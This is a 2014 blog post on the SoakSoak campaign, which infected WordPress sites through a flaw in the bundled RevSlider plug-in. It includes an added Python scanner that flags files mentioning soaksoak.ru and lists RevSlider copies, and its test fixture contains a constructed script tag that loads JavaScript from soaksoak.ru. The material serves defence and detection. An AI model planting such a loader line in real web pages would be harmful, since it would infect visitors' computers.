
SoakSoak: The Malware That Has Infected 100,000+ WordPress Sites

Posted by Davide Palumbo on Tue, Dec 16, 2014

A Russian malware campaign known as SoakSoak has infected over 100,000 WordPress sites since Sunday, December 14th, turning blogs into attack platforms. The malware attempts to install dangerous programs on visitors' computers that could steal or delete their information. In an attempt to curb the damage, Google has blacklisted more than 11,000 websites that were found to be infected. According to security firm Sucuri, the first firm to report on the blacklisting, the malware exploits a vulnerability in a slideshow plug-in called Slider Revolution (RevSlider). The Slider Revolution team has already fixed the vulnerability in later releases. Unfortunately, old, vulnerable versions of the plug-in remain bundled inside many WordPress themes, so a large number of sites are still running the vulnerable code without having installed it themselves. SoakSoak modifies a file in the infected site's WordPress installation so that it loads JavaScript malware from the soaksoak.ru domain, which is where the malware's name comes from.

Researchers at Sucuri are warning that it will be hard to completely eradicate the malware so long as many site owners have no idea that it is there. To remove the malicious code, site administrators will need to clean the modified files and update the premium plug-in, otherwise the site is simply compromised again. According to Daniel Cid from Sucuri, “The biggest issue is that the RevSlider plugin is a premium plugin; it is not something that everyone can easily upgrade and this can easily become a disaster for website owners. Some website owners have no idea they have it, as it has been packaged and bundled into their website themes. We are currently remediating thousands of sites and when engaging with our clients many had no idea the plugin was even within their environment.” In addition, Cid stated that even when website owners try to clean the affected files in their WordPress installation, they may be rapidly re-infected because of improper cleaning efforts.
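The two facts above that matter to a site administrator are that the injected code references the soaksoak.ru domain and that the vulnerable RevSlider plug-in may be sitting inside a theme directory rather than in the plugins directory. The following script is an added example (not code from the original post, Sucuri, or the Slider Revolution project) that walks a WordPress document root and reports both indicators, so that cleanup does not miss a bundled copy of the plug-in. It assumes that RevSlider ships as a directory named `revslider` containing a `revslider.php` file with a standard WordPress `Version:` header; the sample site tree it builds, including the file names and the injected loader line, is constructed for the demonstration and is not taken from a real infection.

```python
"""Report SoakSoak-related indicators in a WordPress tree (added example).

Indicator 1: any PHP/JS/HTML file that mentions the soaksoak.ru domain.
Indicator 2: every copy of the Slider Revolution (RevSlider) plug-in,
             wherever it lives, with the version read from its header.
The script only reports; it does not delete or modify anything.
"""
import re
import tempfile
from pathlib import Path

# Matched case-insensitively and without a scheme, because the post only
# tells us the domain, not the exact URL the injected loader uses.
SOAKSOAK_RE = re.compile(rb"soaksoak\.ru", re.IGNORECASE)

# Assumption: the plug-in directory is 'revslider' and its main file
# 'revslider.php' carries a standard WordPress 'Version: x.y.z' header.
REVSLIDER_DIR = "revslider"
VERSION_RE = re.compile(rb"^\s*\*?\s*Version:\s*([0-9][0-9.]*)", re.MULTILINE)

SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}


def find_soaksoak_refs(root):
    """Return sorted relative paths of text files that mention soaksoak.ru."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            try:
                data = path.read_bytes()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if SOAKSOAK_RE.search(data):
                hits.append(str(path.relative_to(root)))
    return sorted(hits)


def find_revslider_copies(root):
    """Return {relative dir: version or None} for every revslider directory
    under root, whether in wp-content/plugins or bundled inside a theme."""
    root = Path(root)
    copies = {}
    for path in root.rglob(REVSLIDER_DIR):
        if not path.is_dir():
            continue
        version = None
        main = path / "revslider.php"
        if main.is_file():
            match = VERSION_RE.search(main.read_bytes())
            if match:
                version = match.group(1).decode()
        copies[str(path.relative_to(root))] = version
    return copies


def report(root):
    """Combine both indicators into one plain dict."""
    return {
        "soaksoak_refs": find_soaksoak_refs(root),
        "revslider_copies": find_revslider_copies(root),
    }


def build_sample_site(base):
    """Write a small constructed WordPress-like tree (not real site data):
    a current plug-in copy, an older copy bundled in a theme, one theme
    file carrying a constructed loader for soaksoak.ru, and a clean file."""
    files = {
        "wp-content/plugins/revslider/revslider.php":
            b"<?php\n/*\nPlugin Name: Slider Revolution\nVersion: 4.6.0\n*/\n",
        "wp-content/themes/demo/rs-plugin/revslider/revslider.php":
            b"<?php\n/*\nPlugin Name: Slider Revolution\nVersion: 4.1.4\n*/\n",
        "wp-content/themes/demo/footer.php":
            b"<?php /* constructed injected loader */ ?>\n"
            b"<script src=\"//soaksoak.ru/loader.js\"></script>\n",
        "wp-content/themes/demo/header.php": b"<?php /* clean */ ?>\n",
    }
    for rel, content in files.items():
        path = Path(base) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(content)


def scan_sample_site():
    """Build the constructed fixture in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return report(tmp)


if __name__ == "__main__":
    for key, value in scan_sample_site().items():
        print(key, value)
```

Run it against a real site as `report("/var/www/html")` and treat every path in `soaksoak_refs` as a file to restore from a known-good copy, and every entry in `revslider_copies` as a plug-in that must be updated, including the ones inside theme directories, since leaving a bundled vulnerable copy in place is exactly how sites get re-infected after a cleanup.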

Gaming site Dulfy was one of the first infected domains to fix the problem, by removing the injected code and putting the site behind a firewall, but the malware may persist indefinitely on blogs with less diligent administrators. In addition, Dulfy's administrators are not even sure that the fix is permanent. "The firewall will be a temporary measure until we can figure out what is doing it," site owner Kristina Hunter stated.

Over 70 million sites use WordPress as a content management system, from personal blogs to Time.com. This is bad news for anyone who uses the internet: WordPress sites are incredibly common, and Google has only caught a small percentage of the infected ones. It is also not yet clear whether the malware distributors are aiming to steal data or to do something even more despicable. In the meantime, security researcher Graham Cluley suggested that Google's decision to blacklist more than 11,000 affected domains soon after the attack was publicized was “a quick-thinking reaction which hopefully will make it more difficult for the attackers to monetize their cybercriminal campaign”.

I could not have written this article without the help of the following sources:

  1. http://www.theguardian.com/technology/2014/dec/16/soaksoak-malware-wordpress-blacklisted-google
  2. http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522


Tags: Disaster Recovery, Data Security